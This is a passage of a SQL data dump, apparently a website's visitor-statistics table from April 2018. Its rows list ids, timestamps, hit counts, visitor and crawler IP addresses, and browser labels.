,0,'66.249.66.195',''),(235798,1524712476,1,0,1,0,'66.249.66.157',''),(235799,1524712611,1,1,0,0,'217.69.133.203','other'),(235800,1524713853,1,1,0,0,'207.46.13.94','other'),(235801,1524714108,1,1,0,0,'180.76.15.30','other'),(235802,1524714447,1,1,0,0,'37.9.113.115','other'),(235803,1524714887,1,1,0,0,'8.29.198.27','other'),(235804,1524714913,1,1,0,0,'141.8.142.74','other'),(235805,1524714931,1,1,0,0,'178.154.171.88','other'),(235806,1524715170,1,1,0,0,'163.172.4.153','chrome'),(235807,1524716466,1,1,0,0,'141.8.142.74','other'),(235808,1524717952,228,228,0,0,'95.216.20.162','other'),(235809,1524718515,1,1,0,0,'141.8.142.123','other'),(235810,1524718612,1,1,0,0,'37.9.113.100','other'),(235811,1524719030,1,1,0,0,'54.165.59.7','other'),(235812,1524719445,1,1,0,0,'8.29.198.27','other'),(235813,1524719879,1,1,0,0,'141.8.132.19','other'),(235814,1524719992,1,1,0,0,'95.135.12.68','chrome'),(235815,1524720075,1,1,0,0,'216.244.66.237','other'),(235816,1524720166,2,2,0,0,'54.165.59.7','other'),(235817,1524720950,1,1,0,0,'37.55.226.189','chrome'),(235818,1524721236,5,5,0,0,'91.196.178.69','chrome'),(235819,1524722091,1,1,0,0,'92.112.228.219','firefox'),(235820,1524722351,2,2,0,0,'91.196.178.65','chrome'),(235821,1524722605,1,1,0,0,'95.135.228.105','chrome'),(235822,1524723142,1,1,0,0,'87.250.224.125','other'),(235823,1524723171,1,1,0,0,'91.196.178.90','chrome'),(235824,1524723768,1,1,0,0,'95.132.40.70','firefox'),(235825,1524723882,1,1,0,0,'195.10.210.70','chrome'),(235826,1524723971,1,1,0,0,'5.45.207.83','other'),(235827,1524724317,1,1,0,0,'87.250.224.46','other'),(235828,1524724620,1,0,1,0,'66.249.66.201',''),(235829,1524725627,1,1,0,0,'91.196.178.93','chrome'),(235830,1524725667,1,1,0,0,'207.46.13.58','other'),(235831,1524725720,1,1,0,0,'8.29.198.27','other'),(235832,1524725973,2,2,0,0,'178.62.238.64','chrome'),(235833,1524726607,1,1,0,0,'46.161.9.39','chrome'),(235834,1524726867,2,2,0,0,'92.113.43.150','msie'),(235835,1524727297,1,1,0,0,'87.250.224.125','other'),(235836,1524729650,1,1,0,0,'141.8.142.74','other'),(235837,1524730168,1,1,0,0,'46.211.123.226','other'),(235838,1524730282,1,1,0,0,'8.29.198.26','other'),(235839,1524730430,2,2,0,0,'91.196.178.69','chrome'),(235840,1524731249,1,1,0,0,'216.244.66.237','other'),(235841,1524731354,1,1,0,0,'217.69.133.217','other'),(235842,1524731355,1,1,0,0,'217.69.133.219','other'),(235843,1524731777,1,1,0,0,'193.107.104.36','firefox'),(235844,1524732761,1,1,0,0,'207.46.13.107','other'),(235845,1524732895,1,1,0,0,'91.196.178.132','firefox'),(235846,1524733413,1,1,0,0,'87.250.224.46','other'),(235847,1524735022,1,1,0,0,'95.221.59.27','msie'),(235848,1524736155,2,2,0,0,'91.196.178.69','chrome'),(235849,1524736168,1,1,0,0,'207.46.13.165','other'),(235850,1524736211,1,1,0,0,'95.132.40.70','firefox'),(235851,1524736446,1,1,0,0,'216.244.66.237','other'),(235852,1524736561,1,1,0,0,'8.29.198.27','other'),(235853,1524736649,1,1,0,0,'54.165.59.7','other'),(235854,1524737116,1,1,0,0,'91.196.177.46','chrome'),(235855,1524737579,1,1,0,0,'54.165.59.7','other'),(235856,1524738199,1,1,0,0,'91.209.11.236','other'),(235857,1524738802,1,1,0,0,'141.8.142.74','other'),(235858,1524738948,1,1,0,0,'91.196.178.131','chrome'),(235859,1524739458,35,35,0,0,'46.4.0.246','other'),(235860,1524739958,1,1,0,0,'141.8.142.74','other'),(235861,1524740909,1,1,0,0,'91.209.11.236','other'),(235862,1524741012,1,0,1,0,'66.249.66.199',''),(235863,1524741108,1,1,0,0,'8.29.198.25','other'),(235864,1524741246,1,1,0,0,'66.249.66.195','chrome'),(235865,1524742177,2,2,0,0,'91.196.178.169','chrome'),(235866,1524742277,2,2,0,0,'130.180.217.230','chrome'),(235867,1524742656,1,1,0,0,'66.249.66.201','chrome'),(235868,1524742976,1,1,0,0,'216.244.66.237','other'),(235869,1524743886,1,1,0,0,'95.132.40.70','firefox'),(235870,1524744039,1,1,0,0,'180.76.15.19','other'),(235871,1524744121,1,1,0,0,'66.249.66.201','chrome'),(235872,1524744417,1,1,0,0,'216.244.66.237','other'),(235873,1524744618,1,1,0,0,'91.196.178.88','firefox'),(235874,1524744673,2,2,0,0,'66.249.66.195','chrome'),(235875,1524744860,1,0,1,0,'66.249.66.199',''),(235876,1524745291,1,1,0,0,'178.154.171.88','other'),(235877,1524745461,1,1,0,0,'92.112.219.254','chrome'),(235878,1524745596,2,2,0,0,'144.76.6.230','other'),(235879,1524745916,1,1,0,0,'66.249.66.195','chrome'),(235880,1524746096,1,1,0,0,'91.124.182.170','firefox'),(235881,1524746150,1,1,0,0,'91.196.178.132','firefox'),(235882,1524746291,1,1,0,0,'87.250.224.46','other'),(235883,1524746549,1,1,0,0,'66.249.66.156','chrome'),(235884,1524746576,1,1,0,0,'180.76.15.163','other'),(235885,1524746724,1,1,0,0,'141.8.142.74','other'),(235886,1524747068,1,1,0,0,'95.108.181.111','other'),(235887,1524747392,1,1,0,0,'8.29.198.27','other'),(235888,1524747545,2,2,0,0,'91.196.178.65','chrome'),(235889,1524747784,1,1,0,0,'79.126.250.135','msie'),(235890,1524748061,1,1,0,0,'188.230.43.254','other'),(235891,1524748157,1,1,0,0,'87.250.224.46','other'),(235892,1524748256,1,1,0,0,'95.132.57.252','firefox'),(235893,1524748284,1,1,0,0,'141.8.142.74','other'),(235894,1524748339,1,1,0,0,'91.196.177.15','chrome'),(235895,1524748674,1,1,0,0,'91.196.178.90','firefox'),(235896,1524748734,1,1,0,0,'207.46.13.162','other'),(235897,1524748852,23,23,0,0,'192.99.69.242','other'),(235898,1524749434,1,1,0,0,'37.55.200.113','chrome'),(235899,1524749641,1,1,0,0,'216.244.66.237','other'),(235900,1524749810,1,1,0,0,'194.187.216.12','chrome'),(235901,1524749922,2,2,0,0,'95.85.33.177','chrome'),(235902,1524750118,1,1,0,0,'5.9.60.241','other'),(235903,1524750487,1,1,0,0,'188.230.43.254','other'),(235904,1524751244,1,1,0,0,'141.8.142.74','other'),(235905,1524751330,1,1,0,0,'216.244.66.237','other'),(235906,1524751411,1,1,0,0,'207.46.13.162','other'),(235907,1524751671,3,3,0,0,'91.196.178.161','chrome'),(235908,1524751708,1,1,0,0,'180.76.15.6','other'),(235909,1524751729,1,1,0,0,'91.196.178.8','chrome'),(235910,1524751939,1,1,0,0,'8.29.198.25','other'),(235911,1524752284,1,1,0,0,'216.244.66.237','other'),(235912,1524752901,1,1,0,0,'188.230.43.254','other'),(235913,1524752920,1,1,0,0,'35.226.23.240','other'),(235914,1524753243,1,1,0,0,'141.8.142.74','other'),(235915,1524753326,1,1,0,0,'216.244.66.237','other'),(235916,1524754505,2,2,0,0,'91.196.178.65','chrome'),(235917,1524754768,1,1,0,0,'91.196.178.68','firefox'),(235918,1524755196,1,1,0,0,'94.156.174.184','chrome'),(235919,1524755254,1,1,0,0,'188.230.43.254','other'),(235920,1524756547,1,1,0,0,'91.214.176.181','firefox'),(235921,1524757657,1,1,0,0,'188.230.43.254','other'),(235922,1524758240,1,1,0,0,'8.29.198.25','other'),(235923,1524758844,1,1,0,0,'216.244.66.237','other'),(235924,1524759629,1,1,0,0,'35.226.23.240','other'),(235925,1524759944,1,1,0,0,'91.209.11.236','other'),(235926,1524760055,1,1,0,0,'188.230.43.254','other'),(235927,1524760606,2,2,0,0,'216.244.66.237','other'),(235928,1524761732,1,1,0,0,'217.69.133.84','other'),(235929,1524762196,1,1,0,0,'141.8.142.74','other'),(235930,1524762461,1,1,0,0,'188.230.43.254','other'),(235931,1524762625,2,2,0,0,'91.196.178.167','chrome'),(235932,1524762765,1,1,0,0,'8.29.198.25','other'),(235933,1524762904,1,1,0,0,'217.69.133.226','other'),(235934,1524763084,2,2,0,0,'216.244.66.237','other'),(235935,1524763196,1,1,0,0,'217.69.133.4','other'),(235936,1524764068,2,2,0,0,'216.244.66.237','other'),(235937,1524764856,1,1,0,0,'188.230.43.254','other'),(235938,1524765055,1,1,0,0,'66.249.66.201','chrome'),(235939,1524765633,1,1,0,0,'216.244.66.237','other'),(235940,1524766609,1,1,0,0,'216.244.66.237','other'),(235941,1524766970,1,1,0,0,'157.55.39.122','other'),(235942,1524768403,2,2,0,0,'91.196.178.58','chrome'),(235943,1524769074,1,1,0,0,'8.29.198.25','other'),(235944,1524769646,1,1,0,0,'66.249.66.195','chrome'),(235945,1524769824,1,1,0,0,'216.244.66.237','other'),(235946,1524769917,1,1,0,0,'37.9.113.115','other'),(235947,1524770017,1,1,0,0,'207.46.13.165','other'),(235948,1524771284,1,1,0,0,'216.244.66.237','other'),(235949,1524771725,1,1,0,0,'66.102.9.40','chrome'),(235950,1524771921,1,1,0,0,'91.196.178.90','firefox'),(235951,1524773593,1,1,0,0,'8.29.198.25','other'),(235952,1524774568,7,7,0,0,'46.4.107.106','other'),(235953,1524775226,1,1,0,0,'216.244.66.237','other'),(235954,1524776063,2,2,0,0,'91.196.178.8','chrome'),(235955,1524776965,1,1,0,0,'217.69.133.67','other'),(235956,1524777434,2,2,0,0,'162.210.196.130','other'),(235957,1524777448,2,2,0,0,'35.226.23.240','other'),(235958,1524777682,1,1,0,0,'66.249.66.201','chrome'),(235959,1524779787,1,1,0,0,'217.69.133.216','other'),(235960,1524779903,1,1,0,0,'8.29.198.27','other'),(235961,1524780156,1,1,0,0,'217.69.133.194','other'),(235962,1524781401,1,1,0,0,'207.46.13.1','other'),(235963,1524781925,1,1,0,0,'178.154.171.88','other'),(235964,1524781943,1,1,0,0,'141.8.142.74','other'),(235965,1524782532,1,1,0,0,'216.244.66.237','other'),(235966,1524784427,1,1,0,0,'8.29.198.25','other'),(235967,1524785461,1,1,0,0,'207.46.13.38','other'),(235968,1524786241,1,1,0,0,'217.69.133.225','other'),(235969,1524787169,3,2,1,0,'66.249.66.155',''),(235970,1524787800,2,0,2,0,'66.249.66.156',''),(235971,1524788422,2,0,2,0,'66.249.66.155',''),(235972,1524788577,1,0,1,0,'66.249.66.76',''),(235973,1524789048,1,1,0,0,'66.249.66.155','chrome'),(235974,1524789307,2,1,1,0,'66.249.66.157',''),(235975,1524789320,2,1,1,0,'66.249.66.156',''),(235976,1524789432,1,1,0,0,'66.249.66.75','chrome'),(235977,1524789538,1,1,0,0,'157.55.39.69','other'),(235978,1524790730,1,1,0,0,'8.29.198.27','other'),(235979,1524791055,1,0,1,0,'66.249.66.156',''),(235980,1524791340,1,1,0,0,'216.244.66.237','other'),(235981,1524791427,1,1,0,0,'217.69.133.194','other'),(235982,1524791707,1,0,1,0,'66.249.66.75',''),(235983,1524792648,1,1,0,0,'66.249.66.155','chrome'),(235984,1524792879,1,1,0,0,'141.8.142.74','other'),(235985,1524793095,1,1,0,0,'66.249.66.157','chrome'),(235986,1524793422,1,1,0,0,'110.83.60.249','other'),(235987,1524795255,1,1,0,0,'8.29.198.27','other'),(235988,1524795720,1,0,1,0,'66.249.66.155',''),(235989,1524796067,1,1,0,0,'66.249.66.156','chrome'),(235990,1524796076,1,1,0,0,'91.209.11.236','other'),(235991,1524796138,2,2,0,0,'141.8.142.74','other'),(235992,1524796496,1,1,0,0,'217.69.133.223','other'),(235993,1524797508,1,0,1,0,'66.249.66.75',''),(235994,1524797751,1,1,0,0,'66.249.66.75','chrome'),(235995,1524798342,1,0,1,0,'66.249.66.155',''),(235996,1524798755,2,0,2,0,'66.249.66.156',''),(235997,1524800359,2,0,2,0,'66.249.66.156',''),(235998,1524800919,1,1,0,0,'216.244.66.237','other'),(235999,1524800983,1,1,0,0,'217.69.133.215','other'),(236000,1524801298,1,1,0,0,'91.213.59.28','chrome'),(236001,1524801566,1,1,0,0,'8.29.198.26','other'),(236002,1524802203,2,2,0,0,'216.244.66.237','other'),(236003,1524802536,1,1,0,0,'217.69.133.2','other'),(236004,1524804405,1,0,1,0,'66.249.66.156',''),(236005,1524804777,1,0,1,0,'66.249.66.157',''),(236006,1524805029,1,1,0,0,'66.249.66.156','chrome'),(236007,1524805154,91,91,0,0,'95.216.16.17','other'),(236008,1524806019,1,1,0,0,'180.76.15.134','other'),(236009,1524806086,1,0,1,0,'66.249.66.157',''),(236010,1524806088,1,1,0,0,'8.29.198.25','other'),(236011,1524806779,1,0,1,0,'66.249.66.75',''),(236012,1524807760,1,1,0,0,'178.154.171.88','other'),(236013,1524808296,1,0,1,0,'66.249.66.155',''),(236014,1524808541,1,1,0,0,'95.135.48.18','chrome'),(236015,1524808652,1,1,0,0,'207.46.13.1','other'),(236016,1524809238,1,1,0,0,'66.249.66.75','chrome'),(236017,1524809395,1,1,0,0,'91.196.177.46','chrome'),(236018,1524809818,1,1,0,0,'35.226.23.240','other'),(236019,1524810117,1,1,0,0,'95.132.22.251','firefox'),(236020,1524810977,2,2,0,0,'66.249.66.155','chrome'),(236021,1524811398,1,1,0,0,'66.249.66.156','chrome'),(236022,1524811875,1,1,0,0,'178.154.171.88','other'),(236023,1524812360,1,1,0,0,'91.209.11.236','other'),(236024,1524812393,1,1,0,0,'8.29.198.26','other'),(236025,1524813031,1,0,1,0,'66.249.66.155',''),(236026,1524813127,1,1,0,0,'217.69.133.220','other'),(236027,1524813737,1,1,0,0,'91.196.178.130','firefox'),(236028,1524814720,1,1,0,0,'94.179.57.199','chrome'),(236029,1524814825,1,1,0,0,'66.249.66.156','chrome'),(236030,1524814933,1,1,0,0,'91.196.178.102','chrome'),(236031,1524814981,1,1,0,0,'216.244.66.237','other'),(236032,1524815713,1,0,1,0,'66.249.66.155',''),(236033,1524815946,1,1,0,0,'216.244.66.237','other'),(236034,1524816270,6,6,0,0,'95.216.10.80','other'),(236035,1524816380,1,1,0,0,'91.196.178.100','chrome'),(236036,1524816543,1,1,0,0,'141.8.142.74','other'),(236037,1524816766,1,1,0,0,'87.250.224.46','other'),(236038,1524816920,1,1,0,0,'8.29.198.25','other'),(236039,1524817742,1,1,0,0,'216.244.66.237','other'),(236040,1524817940,1,1,0,0,'66.249.66.157','chrome'),(236041,1524818153,5,5,0,0,'91.196.178.69','chrome'),(236042,1524818247,3,3,0,0,'178.154.171.88','other'),(236043,1524818721,1,1,0,0,'46.211.112.37','other'),(236044,1524818759,1,0,1,0,'66.249.66.156',''),(236045,1524818893,1,1,0,0,'91.196.177.46','chrome'),(236046,1524819364,1,1,0,0,'216.244.66.237','other'),(236047,1524819425,4,4,0,0,'91.196.178.69','chrome'),(236048,1524819764,2,2,0,0,'91.196.178.39','chrome'),(236049,1524820216,1,0,1,0,'66.249.66.155',''),(236050,1524820482,2,0,2,0,'66.249.66.157',''),(236051,1524820629,1,1,0,0,'216.244.66.237','other'),(236052,1524821030,1,1,0,0,'40.77.167.166','other'),(236053,1524821045,1,1,0,0,'37.54.22.30','firefox'),(236054,1524821205,1,1,0,0,'141.8.142.74','other'),(236055,1524821496,1,1,0,0,'91.196.178.100','chrome'),(236056,1524821676,1,1,0,0,'54.165.59.7','other'),(236057,1524821837,1,1,0,0,'91.196.178.89','firefox'),(236058,1524822600,1,1,0,0,'141.8.142.74','other'),(236059,1524823238,1,1,0,0,'8.29.198.27','other'),(236060,1524823246,1,0,1,0,'66.249.66.155',''),(236061,1524824231,1,1,0,0,'207.46.13.112','other'),(236062,1524825258,1,1,0,0,'141.8.142.74','other'),(236063,1524825910,1,1,0,0,'54.208.102.37','other'),(236064,1524825980,1,1,0,0,'35.226.23.240','other'),(236065,1524826037,2,2,0,0,'207.46.13.38','other'),(236066,1524826650,1,1,0,0,'91.196.178.102','msie'),(236067,1524826687,1,1,0,0,'217.182.203.54','chrome'),(236068,1524826691,2,2,0,0,'91.196.178.102','chrome'),(236069,1524826755,1,1,0,0,'216.244.66.237','other'),(236070,1524826788,1,0,1,0,'66.249.66.156',''),(236071,1524826981,1,1,0,0,'37.9.113.182','other'),(236072,1524827287,1,0,1,0,'66.249.66.74',''),(236073,1524827757,1,1,0,0,'8.29.198.26','other'),(236074,1524828438,2,2,0,0,'141.8.142.74','other'),(236075,1524828461,2,2,0,0,'216.244.66.237','other'),(236076,1524829101,1,1,0,0,'207.46.13.1','other'),(236077,1524829582,2,2,0,0,'178.154.171.88','other'),(236078,1524830302,2,2,0,0,'130.180.220.132','chrome'),(236079,1524831183,1,1,0,0,'107.167.106.115','other'),(236080,1524831336,2,2,0,0,'91.196.178.169','chrome'),(236081,1524831542,1,1,0,0,'46.201.113.122','chrome'),(236082,1524831784,1,1,0,0,'46.37.194.226','chrome'),(236083,1524832381,1,1,0,0,'178.154.171.88','other'),(236084,1524832682,1,1,0,0,'66.249.66.156','chrome'),(236085,1524833201,3,3,0,0,'216.244.66.237','other'),(236086,1524833635,2,2,0,0,'109.236.92.157','other'),(236087,1524833873,1,0,1,0,'66.249.66.74',''),(236088,1524834065,1,1,0,0,'8.29.198.27','other'),(236089,1524834376,3,3,0,0,'141.8.142.74','other'),(236090,1524834502,1,1,0,0,'66.249.66.155','chrome'),(236091,1524835351,1,1,0,0,'201.184.81.78','chrome'),(236092,1524836418,2,2,0,0,'216.244.66.237','other'),(236093,1524836952,1,1,0,0,'66.249.66.155','chrome'),(236094,1524837333,2,2,0,0,'216.244.66.237','other'),(236095,1524837660,1,1,0,0,'217.69.133.2','other'),(236096,1524838582,1,1,0,0,'8.29.198.25','other'),(236097,1524838687,1,1,0,0,'66.249.66.76','chrome'),(236098,1524838741,1,1,0,0,'178.154.171.88','other'),(236099,1524838745,2,2,0,0,'141.8.142.74','other'),(236100,1524838823,1,1,0,0,'216.244.66.237','other'),(236101,1524838835,2,2,0,0,'92.113.126.46','chrome'),(236102,1524839818,1,1,0,0,'188.230.43.254','other'),(236103,1524841672,1,1,0,0,'66.249.66.157','chrome'),(236104,1524841934,1,1,0,0,'207.46.13.38','other'),(236105,1524842262,1,1,0,0,'188.230.43.254','other'),(236106,1524842753,1,1,0,0,'216.244.66.237','other'),(236107,1524843837,1,1,0,0,'141.8.142.74','other'),(236108,1524844160,1,1,0,0,'216.244.66.237','other'),(236109,1524844318,1,1,0,0,'66.249.66.157','chrome'),(236110,1524844616,1,1,0,0,'188.230.43.254','other'),(236111,1524844851,12,12,0,0,'158.69.254.103','other'),(236112,1524844895,1,1,0,0,'8.29.198.25','other'),(236113,1524845281,2,2,0,0,'91.196.178.39','chrome'),(236114,1524846747,1,1,0,0,'180.76.15.15','other'),(236115,1524847014,1,1,0,0,'188.230.43.254','other'),(236116,1524848017,1,1,0,0,'87.250.224.46','other'),(236117,1524848333,2,2,0,0,'199.58.86.209','other'),(236118,1524848488,1,1,0,0,'207.46.13.1','other'),(236119,1524848501,1,1,0,0,'216.244.66.237','other'),(236120,1524848753,1,1,0,0,'217.69.133.9','other'),(236121,1524849411,1,1,0,0,'8.29.198.25','other'),(236122,1524849526,1,1,0,0,'141.8.142.74','other'),(236123,1524849553,1,1,0,0,'66.249.66.155','chrome'),(236124,1524851066,2,2,0,0,'92.113.126.46','chrome'),(236125,1524851312,1,1,0,0,'188.230.43.254','other'),(236126,1524852337,1,1,0,0,'130.180.209.8','chrome'),(236127,1524852414,1,1,0,0,'40.77.167.0','other'),(236128,1524853323,1,1,0,0,'157.55.39.69','other'),(236129,1524854325,2,2,0,0,'91.196.178.166','chrome'),(236130,1524854653,4,4,0,0,'216.244.66.237','other'),(236131,1524855329,1,1,0,0,'144.76.8.66','other'),(236132,1524855703,1,1,0,0,'91.196.178.58','chrome'),(236133,1524855717,1,1,0,0,'8.29.198.26','other'),(236134,1524856145,1,1,0,0,'216.244.66.237','other'),(236135,1524856550,1,1,0,0,'217.69.133.226','other'),(236136,1524857560,1,1,0,0,'216.244.66.237','other'),(236137,1524857674,1,1,0,0,'46.161.9.39','firefox'),(236138,1524858338,1,1,0,0,'178.154.171.88','other'),(236139,1524858342,2,2,0,0,'141.8.142.74','other'),(236140,1524858896,1,1,0,0,'216.244.66.237','other'),(236141,1524859638,1,0,1,0,'66.249.66.156',''),(236142,1524860142,1,1,0,0,'66.249.66.155','chrome'),(236143,1524860161,1,1,0,0,'37.73.219.23','chrome'),(236144,1524860233,1,1,0,0,'8.29.198.26','other'),(236145,1524860560,1,0,1,0,'66.249.66.156',''),(236146,1524861962,1,1,0,0,'40.77.167.67','other'),(236147,1524862192,3,3,0,0,'216.244.66.237','other'),(236148,1524862473,1,1,0,0,'87.250.224.46','other'),(236149,1524863149,1,1,0,0,'178.154.171.88','other'),(236150,1524863690,1,1,0,0,'217.69.133.224','other'),(236151,1524863959,1,1,0,0,'118.193.139.74','chrome'),(236152,1524864701,1,1,0,0,'87.250.224.46','other'),(236153,1524864988,1,1,0,0,'193.70.34.209','chrome'),(236154,1524865194,2,2,0,0,'173.212.201.251','other'),(236155,1524865525,1,1,0,0,'66.249.66.157','chrome'),(236156,1524865970,2,2,0,0,'216.244.66.237','other'),(236157,1524866468,1,1,0,0,'180.76.15.158','other'),(236158,1524866553,1,1,0,0,'8.29.198.25','other'),(236159,1524867692,1,1,0,0,'217.69.133.85','other'),(236160,1524869222,1,1,0,0,'66.249.66.156','chrome'),(236161,1524869418,1,1,0,0,'40.77.167.67','other'),(236162,1524869602,1,1,0,0,'141.8.142.74','other'),(236163,1524870024,22,22,0,0,'167.114.219.41','other'),(236164,1524870227,1,1,0,0,'207.46.13.66','other'),(236165,1524870504,1,1,0,0,'216.244.66.237','other'),(236166,1524871057,1,1,0,0,'8.29.198.26','other'),(236167,1524871780,1,1,0,0,'54.165.59.7','other'),(236168,1524873199,1,1,0,0,'66.249.66.75','chrome'),(236169,1524874426,1,1,0,0,'216.244.66.237','other'),(236170,1524874826,1,1,0,0,'54.165.59.7','other'),(236171,1524875799,1,1,0,0,'216.244.66.237','other'),(236172,1524876614,1,1,0,0,'54.165.59.7','other'),(236173,1524876962,1,1,0,0,'178.154.171.88','other'),(236174,1524877154,1,1,0,0,'141.8.142.74','other'),(236175,1524877298,1,1,0,0,'216.244.66.237','other'),(236176,1524877381,1,1,0,0,'8.29.198.25','other'),(236177,1524878798,1,1,0,0,'217.69.133.67','other'),(236178,1524879831,1,1,0,0,'54.165.59.7','other'),(236179,1524879982,1,1,0,0,'5.9.106.230','other'),(236180,1524880086,1,1,0,0,'216.244.66.237','other'),(236181,1524880347,1,1,0,0,'54.67.59.131','chrome'),(236182,1524881640,1,1,0,0,'216.244.66.237','other'),(236183,1524881894,1,1,0,0,'8.29.198.26','other'),(236184,1524882373,1,1,0,0,'194.187.170.120','other'),(236185,1524883228,1,1,0,0,'35.226.23.240','other'),(236186,1524884457,1,1,0,0,'216.244.66.237','other'),(236187,1524888217,1,1,0,0,'8.29.198.27','other'),(236188,1524888727,10,10,0,0,'5.189.191.207','other'),(236189,1524889021,1,1,0,0,'216.244.66.237','other'),(236190,1524889367,1,1,0,0,'141.8.142.74','other'),(236191,1524890016,2,2,0,0,'91.196.178.8','chrome'),(236192,1524890107,1,1,0,0,'46.161.9.39','firefox'),(236193,1524890375,1,1,0,0,'157.55.39.139','other'),(236194,1524890569,23,23,0,0,'142.4.200.37','other'),(236195,1524891114,1,1,0,0,'207.46.13.66','other'),(236196,1524891714,1,1,0,0,'217.69.133.3','other'),(236197,1524892723,1,1,0,0,'8.29.198.25','other'),(236198,1524893422,1,1,0,0,'54.36.148.66','other'),(236199,1524893520,1,1,0,0,'54.36.148.234','other'),(236200,1524893562,1,1,0,0,'54.36.148.215','other'),(236201,1524893621,1,1,0,0,'54.36.148.172','other'),(236202,1524893640,1,1,0,0,'54.36.148.242','other'),(236203,1524893705,1,1,0,0,'54.36.148.206','other'),(236204,1524893806,1,1,0,0,'54.36.148.188','other'),(236205,1524893866,1,1,0,0,'54.36.148.197','other'),(236206,1524894080,1,1,0,0,'54.36.148.244','other'),(236207,1524894260,1,1,0,0,'54.36.148.211','other'),(236208,1524894465,1,1,0,0,'54.36.148.16','other'),(236209,1524894790,2,2,0,0,'54.36.148.18','other'),(236210,1524895062,1,1,0,0,'54.36.148.114','other'),(236211,1524895131,1,1,0,0,'54.36.148.208','other'),(236212,1524895263,1,1,0,0,'54.36.148.181','other'),(236213,1524895396,1,1,0,0,'54.36.148.37','other'),(236214,1524895425,34,34,0,0,'167.114.219.41','other'),(236215,1524895638,1,1,0,0,'54.36.148.85','other'),(236216,1524895756,1,1,0,0,'54.36.148.175','other'),(236217,1524895832,1,1,0,0,'37.9.113.110','other'),(236218,1524895884,1,1,0,0,'54.36.149.7','other'),(236219,1524896121,1,1,0,0,'216.244.66.237','other'),(236220,1524896272,1,1,0,0,'54.36.149.47','other'),(236221,1524896630,1,1,0,0,'54.36.149.93','other'),(236222,1524897006,1,1,0,0,'95.24.232.98','chrome'),(236223,1524897202,1,1,0,0,'54.36.149.36','other'),(236224,1524897477,1,1,0,0,'207.46.13.66','other'),(236225,1524897561,1,1,0,0,'54.36.149.63','other'),(236226,1524897678,2,2,0,0,'216.244.66.237','other'),(236227,1524897802,1,1,0,0,'54.36.148.16','other'),(236228,1524897970,1,1,0,0,'54.36.148.77','other'),(236229,1524898079,1,1,0,0,'54.36.148.215','other'),(236230,1524898205,1,1,0,0,'54.36.149.11','other'),(236231,1524898290,1,1,0,0,'54.36.148.192','other'),(236232,1524898292,1,1,0,0,'178.154.171.88','other'),(236233,1524898409,1,1,0,0,'54.36.149.55','other'),(236234,1524898420,1,1,0,0,'54.36.148.180','other'),(236235,1524898594,1,1,0,0,'54.36.148.245','other'),(236236,1524898700,1,1,0,0,'141.8.142.74','other'),(236237,1524898747,1,1,0,0,'54.36.148.143','other'),(236238,1524898856,1,1,0,0,'54.36.149.88','other'),(236239,1524898976,1,1,0,0,'54.36.149.22','other'),(236240,1524899032,1,1,0,0,'54.36.148.242','other'),(236241,1524899048,1,1,0,0,'8.29.198.26','other'),(236242,1524899196,1,1,0,0,'178.154.171.88','other'),(236243,1524899294,1,1,0,0,'54.36.148.49','other'),(236244,1524899411,1,1,0,0,'54.36.149.79','other'),(236245,1524899412,1,1,0,0,'54.36.148.172','other'),(236246,1524899435,1,1,0,0,'54.36.149.48','other'),(236247,1524899511,1,1,0,0,'54.36.148.24','other'),(236248,1524899774,1,1,0,0,'54.36.148.109','other'),(236249,1524900078,1,1,0,0,'180.76.15.162','other'),(236250,1524900085,1,1,0,0,'54.36.149.55','other'),(236251,1524900175,1,1,0,0,'54.36.149.78','other'),(236252,1524900272,1,1,0,0,'54.36.148.159','other'),(236253,1524900313,1,1,0,0,'207.46.13.66','other'),(236254,1524900593,1,1,0,0,'216.244.66.237','other'),(236255,1524900897,1,1,0,0,'54.36.148.232','other'),(236256,1524901141,1,1,0,0,'54.36.149.14','other'),(236257,1524901284,1,1,0,0,'54.36.148.10','other'),(236258,1524901304,1,1,0,0,'40.77.167.182','other'),(236259,1524901590,1,1,0,0,'54.36.148.173','other'),(236260,1524901650,1,1,0,0,'54.36.149.104','other'),(236261,1524901654,1,1,0,0,'54.36.148.11','other'),(236262,1524901659,1,1,0,0,'141.8.142.74','other'),(236263,1524901710,1,1,0,0,'54.36.148.116','other'),(236264,1524901717,1,1,0,0,'178.154.171.88','other'),(236265,1524901839,1,1,0,0,'54.36.149.9','other'),(236266,1524902259,1,1,0,0,'216.244.66.237','other'),(236267,1524902386,31,31,0,0,'54.191.153.67','other'),(236268,1524902581,1,1,0,0,'54.36.148.18','other'),(236269,1524902582,1,1,0,0,'54.36.149.33','other'),(236270,1524902604,1,1,0,0,'87.250.224.46','other'),(236271,1524903161,1,1,0,0,'54.36.148.114','other'),(236272,1524903192,1,1,0,0,'54.36.148.110','other'),(236273,1524903258,1,1,0,0,'54.36.149.12','other'),(236274,1524903563,1,1,0,0,'8.29.198.26','other'),(236275,1524903859,1,1,0,0,'54.36.148.193','other'),(236276,1524903909,1,1,0,0,'54.36.148.237','other'),(236277,1524903924,1,1,0,0,'54.36.148.129','other'),(236278,1524904091,1,1,0,0,'54.36.148.199','other'),(236279,1524905132,1,1,0,0,'54.36.148.233','other'),(236280,1524905574,1,1,0,0,'77.111.244.71','chrome'),(236281,1524905720,1,1,0,0,'54.36.148.83','other'),(236282,1524906002,1,1,0,0,'54.36.148.12','other'),(236283,1524906317,1,1,0,0,'54.36.148.161','other'),(236284,1524906345,1,1,0,0,'54.36.148.91','other'),(236285,1524906534,1,1,0,0,'216.244.66.237','other'),(236286,1524906570,1,1,0,0,'54.36.148.47','other'),(236287,1524906723,1,1,0,0,'82.207.96.172','chrome'),(236288,1524906919,1,1,0,0,'54.36.148.165','other'),(236289,1524906963,1,1,0,0,'54.36.148.118','other'),(236290,1524907166,1,1,0,0,'54.36.148.240','other'),(236291,1524907557,1,1,0,0,'54.36.149.84','other'),(236292,1524907884,1,1,0,0,'54.36.149.57','other'),(236293,1524908115,1,1,0,0,'54.36.149.10','other'),(236294,1524908186,1,1,0,0,'54.36.148.113','other'),(236295,1524908334,1,1,0,0,'54.36.148.103','other'),(236296,1524908749,1,1,0,0,'178.154.171.88','other'),(236297,1524908791,1,1,0,0,'216.244.66.237','other'),(236298,1524909013,1,1,0,0,'54.36.148.138','other'),(236299,1524909474,1,1,0,0,'54.36.148.148','other'),(236300,1524909503,1,1,0,0,'40.77.167.182','other'),(236301,1524909614,1,1,0,0,'141.8.142.74','other'),(236302,1524909699,1,1,0,0,'54.36.148.153','other'),(236303,1524909737,1,1,0,0,'54.36.148.250','other'),(236304,1524909881,1,1,0,0,'8.29.198.26','other'),(236305,1524909978,1,1,0,0,'54.36.148.249','other'),(236306,1524910145,1,1,0,0,'54.36.148.106','other'),(236307,1524910241,1,1,0,0,'54.36.149.